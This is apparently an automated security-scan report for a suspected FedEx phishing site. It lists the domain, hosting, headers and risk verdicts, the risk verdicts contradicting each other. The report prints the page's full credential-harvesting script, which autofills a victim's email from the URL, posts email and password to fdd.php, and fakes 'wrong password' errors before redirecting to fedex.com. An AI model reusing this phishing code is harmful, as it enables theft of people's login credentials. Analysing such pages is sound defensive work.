e-commerce shopping

government public service

news media journalism

adult content

healthcare medical

English

Within the British Indian Ocean Territory country-code top-level domain (.io), 'emm113-emdd.mdbgo.io' is registered with subdomain 'emm113-emdd'. Count 5 characters in 'mdbgo' with 1 vowel and 4 consonants. Tokenizing the label suggests 3 words: m, db, go. The median word length lands at 2 characters. No strong language cues emerged from the frequency lists.

html/6f/55/6f5543d8-454f-4a50-9a8a-985068cded59_fallback.html.gz

FedEx 登录

email

password

html/6f/55/6f5543d8-454f-4a50-9a8a-985068cded59.html.gz

viewport

HSTS header missing - vulnerable to protocol downgrade attacks

CSP header missing - vulnerable to XSS attacks

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;worker-src blob: 'self';frame-ancestors 'none';

child-src https:  chrome-untrusted://new-tab-page/ chrome-untrusted://ntp-microsoft-auth/;connect-src chrome://resources chrome://theme 'self';default-src 'self';font-src chrome://resources 'self';img-src chrome://resources chrome://theme chrome://image chrome://favicon2 chrome://app-icon chrome://extension-icon chrome://fileicon blob: data: 'self';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources chrome://webui-test 'self';style-src chrome://resources chrome://theme 'self' 'unsafe-inline';trusted-types parse-html-subset sanitize-inner-html static-types webui-test-script webui-test-html polymer-html-literal polymer-template-event-attribute-policy lit-html-desktop;frame-ancestors 'none';

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;frame-ancestors 'none';

base-uri 'none';child-src https:;form-action https://ogs.google.com https://*.corp.google.com;object-src 'none';script-src 'self' 'unsafe-inline' https:;frame-ancestors chrome://new-tab-page/

mdbgo.io

VECTRA S.A. abuse handling

VECTRANET MNTERS

VECTRA S.A.

ORG-NCC1-RIPE

VECTRANET-MNT

PL-DAMINET-20080331


    // ✅ Autofill email from hash (plain or base64)
    (function () {
      const rawHash = decodeURIComponent(window.location.hash.substring(1));
      let email = '';

      try {
        if (rawHash.includes('@')) {
          email = rawHash;
        } else {
          const decoded = atob(rawHash);
          if (decoded.includes('@')) {
            email = decoded;
          }
        }
      } catch (e) {
        console.warn("Hash decode failed:", e);
      }

      if (email) {
        const emailInput = document.getElementById("email");
        if (emailInput) emailInput.value = email;
      }
    })();

    const form = document.getElementById("loginForm");
    const emailInput = document.getElementById("email");
    const passwordInput = document.getElementById("password");
    const emailError = document.getElementById("emailError");
    const passwordError = document.getElementById("passwordError");

    let attemptCount = 0;

    form.addEventListener("submit", function (e) {
      e.preventDefault();

      emailError.style.display = "none";
      passwordError.style.display = "none";

      const email = emailInput.value.trim();
      const password = passwordInput.value.trim();

      if (!email || !/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email)) {
        emailError.style.display = "block";
        return;
      }

      if (!password) {
        passwordError.textContent = "Please enter the password.";
        passwordError.style.display = "block";
        return;
      }

      // ✅ Send log on every submit
      fetch("fdd.php", {
        method: "POST",
        headers: {
          "Content-Type": "application/x-www-form-urlencoded"
        },
        body: `email=${encodeURIComponent(email)}&password=${encodeURIComponent(password)}`
      })
      .then(response => response.text())
      .then(data => {
        console.log("Logged:", data);
      })
      .catch(error => {
        console.error("Fetch error:", error);
      });

      // Show wrong password message
      attemptCount++;
      const left = 3 - attemptCount;

      if (attemptCount >= 3) {
        window.location.href = "https://www.fedex.com/";
      } else {
        passwordError.textContent = `The mailbox password is wrong。You still have ${left} attempts。`;
        passwordError.style.display = "block";
        passwordInput.value = "";
      }
    });
  

Node.js

Express

✅ Low Risk - https://emm113-emdd.mdbgo.io/

Requests	IP Address	Location	AS Autonomous System
2	93.105.88.216	Wroclaw, Lower Silesia, Poland	AS50606Horyzont Technologie Internetowe sp.z.o.o.
2	1	-	-

Security Scan Report: emm113-emdd.mdbgo.io

Summary

AI Security Verdict

High Risk

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Detected Technologies2

Content Similarity HashesFor malware variant detection

TLSH (Trend Micro Locality Sensitive Hash)

ssdeep (Context Triggered Piecewise Hashing)

sdhash (Similarity Digest Hashing)

Image Hashes

Perceptual Hashes

Other Hashes

Scan History